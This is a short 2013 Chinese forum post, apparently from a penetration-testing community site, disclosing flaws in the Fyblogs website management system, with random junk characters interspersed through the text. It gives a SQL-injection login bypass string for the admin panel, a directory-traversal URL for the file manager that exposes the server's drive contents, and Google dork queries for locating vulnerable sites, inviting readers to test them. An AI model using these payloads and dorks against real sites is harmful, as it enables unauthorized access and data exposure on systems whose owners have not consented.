中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]

作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
. ~; ]& q( y8 s1 h- s+ q& ?
" k6 g, |/ X1 a/ e2 j5 K简要描述:
5 _/ `3 p+ [9 ~) B/ p2 v. K( L2 r$ w
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!, Y  }! X( |4 K3 v/ _9 L

" o6 P/ c8 C. U: h4 o7 p. v, h详细说明:# \9 U$ o! n/ _4 a
# c& R+ K4 T! V
后台万能密码 'or'='or'2 c9 k. d0 A& {1 {" r% Y
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!; |9 q( q- d- B- C* q+ f8 s
admin/uploadfile.asp?currentFolder=/upfiles/../; g; Z/ G1 a; z
# j# \# O) K& ~: x
漏洞证明:
/ J3 o. ~( b0 T# t4 ^
  O  T: S2 W% n: ^/ `' ?谷歌:inurl:type.asp?id=1 新闻中心) ~' `" ~* f. H- j
或者 :inurl:download_ok.asp?
1 v' Q' I# ^' x( [; }
' s9 T  ?+ {% r可以测试5 `- y: g2 p8 M% W& e3 d

  k4 v. d0 I% G
9 x1 H$ K2 a8 W3 ~# H% P




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2